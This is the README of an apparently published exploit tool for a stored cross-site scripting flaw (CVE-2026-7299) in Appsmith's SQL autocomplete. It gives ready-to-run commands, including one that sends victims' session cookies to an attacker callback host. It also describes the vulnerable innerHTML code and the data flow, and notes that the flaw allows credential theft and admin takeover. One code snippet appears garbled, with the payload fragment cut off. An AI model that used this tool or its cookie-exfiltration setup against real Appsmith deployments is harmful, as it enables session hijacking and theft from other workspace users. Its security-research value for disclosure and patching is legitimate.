## https://sploitus.com/exploit?id=385CEAA1-6BD6-5442-8F5C-FE521F88B1E1
# CVE-2026-7299 - Appsmith 1.98 Stored XSS (SQL Autocomplete innerHTML Sink)
Automated exploit for a stored cross-site scripting vulnerability in Appsmith's SQL query editor. A workspace Developer can inject arbitrary JavaScript via database table names that execute in any other workspace member's browser when SQL autocomplete triggers.
Confirmed on Appsmith **v1.98** and likely affects all prior versions where the custom SQL hint renderer is present. The vulnerability exists in `hintHelpers.ts:165` where CodeMirror's safe default hint rendering (`textContent`) is overridden with a custom `render` callback that uses `innerHTML` to display database table and column names without any sanitisation.
## Usage
Basic alert PoC:
```bash
python3 exploit.py --url http://target:4444 --email attacker@test.com --password Password1!
```
Cookie exfiltration to a callback server:
```bash
python3 exploit.py --url http://target:4444 --email attacker@test.com --password Password1! \
--callback-url http://attacker.com:8888
```
Custom payload:
```bash
python3 exploit.py --url http://target:4444 --email attacker@test.com --password Password1! \
--custom-payload ''
```
If no PostgreSQL datasource exists yet, the script auto-discovers connections or you can provide credentials:
```bash
python3 exploit.py --url http://target:4444 --email attacker@test.com --password Password1! \
--db-host postgres --db-name testdb --db-user postgres --db-pass postgres
```
## Example
### PoC Video Demo
https://www.youtube.com/watch?v=1RHBYZ2Bp_A
## Documentation
### Background
Appsmith is an open-source low-code platform where teams build internal tools by connecting datasources and writing queries. The SQL query editor provides autocomplete suggestions populated from the connected database's table and column metadata.
The autocomplete rendering in `hintHelpers.ts` uses a custom CodeMirror `render` callback:
```javascript
completion.render = (LiElement, _data, { className, text }) => {
const { hintType, iconBgType, iconText } = getHintDetailsFromClassName(text, className);
LiElement.setAttribute("hinttype", hintType);
LiElement.setAttribute("icontext", iconText);
LiElement.classList.add("cm-sql-hint");
LiElement.classList.add(`cm-sql-hint-${iconBgType}`);
LiElement.innerHTML = text; // " (id serial primary key);
```
Any other workspace member opens the SQL query editor for the same datasource and starts typing a query. The autocomplete dropdown appears with table name suggestions fetched from the database metadata. The malicious table name is rendered via `innerHTML`, executing the JavaScript payload in the victim's browser session.
The XSS runs in the Appsmith application context with the victim's session. An attacker can steal session cookies (XSRF-TOKEN, SESSION), exfiltrate datasource credentials, or make API calls as the victim. If the victim is an Admin, the attacker escalates to full workspace control.
### Data flow
```
PostgreSQL pg_catalog (table_name, column_name)
-> PostgresPlugin.getStructure() [no sanitisation]
-> DatasourceStructure Java POJO [no sanitisation]
-> REST API /api/v1/datasources/{id}/structure [no sanitisation]
-> Redux state.entities.datasources [no sanitisation]
-> getAllDatasourceTableKeys selector [no sanitisation]
-> SqlHintHelper.setDatasourceTableKeys() [no sanitisation]
-> CodeMirror hint.sql() completions [no sanitisation]
-> LiElement.innerHTML = text [XSS]
```
No sanitsation present, rendering the payload to innerHTML firing within the DOM once called by the autocomplete renderer.
## References
- [CVE-2026-7299](https://kb.cert.org/vuls/id/265691)
- [Appsmith GitHub Repository](https://github.com/appsmithorg/appsmith)
- [CWE-79: Improper Neutralisation of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)
- [CVE-2026-30862 - Similar pattern in TableWidgetV2 (fixed)](https://github.com/appsmithorg/appsmith/security/advisories)
- Vulnerable file: `app/client/src/components/editorComponents/CodeEditor/hintHelpers.ts:165`
## Disclaimer
This tool is provided for authorised security testing and educational purposes only. Only use against systems you own or have explicit written permission to test. I do not take responsibility for any misuse or damage caused by this tool.
Happy hacking!